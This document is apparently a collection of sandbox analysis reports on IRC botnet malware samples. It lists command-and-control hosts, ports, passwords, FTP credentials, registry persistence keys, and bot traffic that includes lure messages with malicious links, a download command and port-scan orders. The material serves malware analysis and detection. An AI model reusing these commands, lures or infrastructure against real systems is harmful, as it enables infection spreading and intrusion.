sniff.runescapetube.com

Host Name                  IP Address
dell-d3e62f7e26            10.1.8.2
sniff.runescapetube.com    65.23.155.179

* C&C Server: 65.23.155.179:8164
* Server Password:
* Username: XP-6306
* Nickname: [00|DEU|293761]
* Channel: #test# (Password: )
* Channeltopic: :.msn.msg RIP 🙁 http://inlakehouse.com/video002.php?=|.aim.msg this kid died from eating halloween candy he got.. look http://inlakehouse.com/video002.php?=|.triton.msg kid died from halloween candy he got http://inlakehouse.com/video002.php?=

Registry Changes by all processes
Create or

fgp.e2doo.com

Host Name          IP Address
dell-d3e62f7e26    10.1.10.2
fgp.e2doo.com      66.7.216.18

* C&C Server: 66.7.216.18:2345
* Server Password:
* Username: XP-8343
* Nickname: [DEU|00|P|83992]
* Channel: #imb (Password: test)
* Channeltopic: :.msn.stop|.msn.msg hahaha u foto http://freelook.fr.ohost.de/viewimg.php?=

Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce “wextract_cleanup0” = rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 “C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\IXP000.TMP”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Firevall Administrating” = rndll.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run “Firevall Administrating” = rndll.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

videos.sapo.pt

Host Name             IP Address
ftp.xtserverxt.com    64.211.66.173

Outgoing connection to remote server: ftp.xtserverxt.com TCP port 21
Outgoing connection to remote server: ftp.xtserverxt.com TCP port 45685

USER xtserverxt
PASS xt#server#xt

Registry Changes by all processes
Create or Open
Changes
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared “CUAS”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Language Hotkey”
HKEY_CURRENT_USER\Keyboard Layout\Toggle “Layout Hotkey”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF “EnableAnchorContext”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM “Ime File”
HKEY_CURRENT_USER\Software\Microsoft\CTF “Disable Thread Input Manager”
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter “Installed”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService “10”
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll “Name”
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll “Comment”
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll

Server : FBI.GoV [Crew]

Remote Host      Port Number
82.146.52.236    6667

MODE [solo][USA|XP|LAN|71546] -ix
JOIN #nes# usb
PONG FBI.GoV

* The following port was open in the system:

Port    Protocol    Process
1050    TCP         winsvc32.exe (%Windir%\winsvc32.exe)

Registry Modifications

* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + winsvc32 = “winsvc32.exe”

so that winsvc32.exe runs every time Windows starts

Memory Modifications

* There was a

67.43.226.242 (big ruski botnet)

Remote Host      Port Number
67.43.226.242    8080
67.43.232.37     1863
91.207.7.116     80

USER pmawga pmawga pmawga :ymfiwtkaatzcxdhr
NICK RGqbPVQe
MODE RGqbPVQe +xi
JOIN #las6
USERHOST RGqbPVQe
MODE #m +smntu
MODE #las6 +smntu
NICK gYZaluELE
MODE gYZaluELE +xi
JOIN #rrrrr
USERHOST gYZaluELE
MODE ##xddc +smntu
MODE #xddc1 +smntu
MODE #xddc2 +smntu
MODE #rrrrr +smntu
USER ixaexy ixaexy ixaexy :dpsqkauvusrtzeaz

Other details

* The following ports were open in the system:

Port    Protocol    Process
1052    TCP         spoolsvc.exe (%System%\spoolsvc.exe)
2335

snipa.gov (big net)

Remote Host      Port Number
174.133.63.91    51987

NICK pLagUe{USA}56265
MODE pLagUe{USA}56265 -ix
JOIN #H1N1
PRIVMSG #H1N1 :
USER pLagUe * ok
TeaM UniX b0at 0.4
PC has been ~iNfEctEd~

Other details

* The following port was open in the system:

Port    Protocol    Process
1051    TCP         raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created Registry Value is:
  o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    + raidhost = “raidhost.exe”

so that

64.89.27.36 (6k net)

Remote Host    Port Number
64.89.27.36    51987

NICK pLagUe{USA}{LAN}27954
MODE pLagUe{USA}{LAN}27954 -ix
JOIN #trees
PRIVMSG #trees :
PONG irc.lulz.ee
USER pLagUe * ok
TeaM UniX b0at 0.4
New Infection – Morpheous Stub

Other details

* The following port was open in the system:

Port    Protocol    Process
1050    TCP         raidhost.exe (%Windir%\raidhost.exe)

Registry Modifications

* The newly created

69.16.172.40

Remote Host     Port Number
69.16.172.40    7000

NICK marthan
USER roland “” “69.16.172.40” :kendrick
PONG :2613115303
PONG :1661756035
PONG :1971802411

Registry Modifications

* The following Registry Keys were created:
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cha
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chat
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\DefaultIcon
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\command
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\Application
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\ifexec
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ChatFile\Shell\open\ddeexec\Topic
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\DefaultIcon
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell\open
  o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\irc\Shell\open\command

hot.jatajoo.ru

Remote Host        Port Number
174.133.222.172    445
195.190.13.188     7272
222.231.29.29      7272
89.149.244.22      80

* The data identified by the following URL was then requested from the remote web server:
  o http://hot.jatajoo.ru/hot.php

NICK [N00_USA_XP_5605087]
USER SP2-366 * 0 :COMPUTERNAME
JOIN #nit open
PRIVMSG #modes2 :HTTP SET http://rapidshare.com/files/315648191/rost
PRIVMSG #nit :scan// Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutes

baca.no-ip.org

Name              Query Type    Query Result     Successful    Protocol
baca.no-ip.org    DNS_TYPE_A    94.23.234.102    1

94.23.234.102:9876

Nick: :{00-AUT-XP-pc8-4662}
Username: blaze
Server Pass: uline131.
Joined Channel: #uline
Channel Topic for Channel #uline: “!scan 90 1 85.x.x.x 3 1 85.x.x.x 3 16kkj”
Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x80xf6’xa0xf8’xb4x84@: “SC// Sequential Port Scan started on 1:90 with a delay of 60 seconds for 3 minutes using 1 threads.”